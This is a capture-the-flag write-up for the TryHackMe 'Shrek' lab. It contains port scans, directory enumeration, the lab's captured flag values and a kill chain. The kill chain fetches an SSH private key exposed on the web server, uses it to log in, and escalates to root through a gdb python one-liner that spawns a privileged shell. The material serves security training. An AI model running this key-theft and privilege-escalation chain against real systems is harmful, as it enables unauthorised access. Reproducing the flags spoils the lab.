Name
TryHackMe | Shrek
Writer
0x64azana
Genre
Enumeration, Exploitation, Priv-Esc
OS
CentOS 3.10.0-862.el7.x86_64IP
10.10.148.27HOSTNAME
shrekBASIC-INFO
1 Hour to find as many flags as you can!USERS / EMAILS
shrek
CREDENTIALS
??shrek is a winner?? ## See 9. 10. 11.
shrek : id_rsa
==============================================================================
NMAP-RESULTS
init_
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8009/tcp open ajp13
8080/tcp open http-proxy
9999/tcp open abyss
nmap_
Discovered open port 80/tcp on 10.10.148.27 Apache/2.4.6 (CentOS) PHP/7.1.33
Discovered open port 3306/tcp on 10.10.148.27
Discovered open port 22/tcp on 10.10.148.27 OpenSSH 7.4 (protocol 2.0)
Discovered open port 21/tcp on 10.10.148.27 vsftpd 3.0.2
Discovered open port 8080/tcp on 10.10.148.27 Apache Tomcat/7.0.88
Discovered open port 9999/tcp on 10.10.148.27
Discovered open port 65432/tcp on 10.10.148.27 False find
Discovered open port 8009/tcp on 10.10.148.27 Protocol v1.3
==============================================================================
TO-TRY
1. FTP ANON -- Failed
2. Enum 80 (HTTP)
3. Enum 8080 and 9999 (HTTP)
4. Review NMAP output -> 5.
5. See /Cpxtpt2hWCee9VFa.txt -- SUCCESSFUL -> 6.
6. Find the user the id_rsa belongs to. -- 12.
7. Inspect gobuster output for port 80 -> 6.
8. Brute Force http://10.10.148.27:8080/manager/html
9. Base64 decode string found in port 80:/ comments -> 10.
10. Find and decode the second layer of (9.) -> 11.
11. Test the the output as a password -- FAILED
12. Test id_rsa on shrek -- SUCCESSFUL -> 13.
13. Enum Internals -> 14.
14. Enum flags in the system -> 15.
15. Find common privesc methods -- SUCCESSFUL -> 16.
16. Enum all flags as root -- SUCCESSFUL
CVE-LIST
N/A==============================================================================
WEB-TECHS
- PHP
- Apache Tomcat
SUBDIR-ENUMS
N/ADIR-ENUMERATIONS
80_
/api (Status: 301) [Size: 232] [--> http://10.10.148.27/api/]
/cgi-bin/ (Status: 403) [Size: 210]
/cms (Status: 301) [Size: 232] [--> http://10.10.148.27/cms/]
/robots.txt (Status: 200) [Size: 46]
/upload (Status: 301) [Size: 235] [--> http://10.10.148.27/upload/]
8080_
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/manager (Status: 302) [Size: 0] [--> /manager/]
/plain] (Status: 400) [Size: 0]
/quote] (Status: 400) [Size: 0]
==============================================================================
TAKE-AWAYS
1. This is a docker container, as shown by running ip route
Flags_
shrek
0069ba233da89efe6f48e7d214034130
Donkey
974acecd51cc45c843062fdac6235e97
Puss
6f960e8f2ea8e3de92f192fae492ec59
root
8cc6ece048e6c42251c411814ff5a22d
etc
456ca96a9ba8a9f527089ddde0efc92d
==============================================================================
Issues
/robots.txt exposes SSH private key for `shrek` user
Severity
Critical
Compliance Gap
Public exposure of sensitive credentials (CIS, NIST, PCI DSS)
Impact
Attacker can log in via SSH as `shrek`, gaining a foothold and possibly escalating privileges.
Kill Chain
1.
# Displays issue file
curl http://10.10.148.27/robots.txt
2.
# Create the necessary file.
curl http://10.10.148.27/Cpxtpt2hWCee9VFa.txt > id_rsa && chmod 600 ./id_rsa
3.
# Start a connection using the shrek user and the id_rsa file
ssh shrek@10.10.148.27 -i id_rsa
4.
# Priv Esc
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
Remediations
- Remove key from /robots.txt
- Rotate `shrek` SSH key
- Harden web & file permissions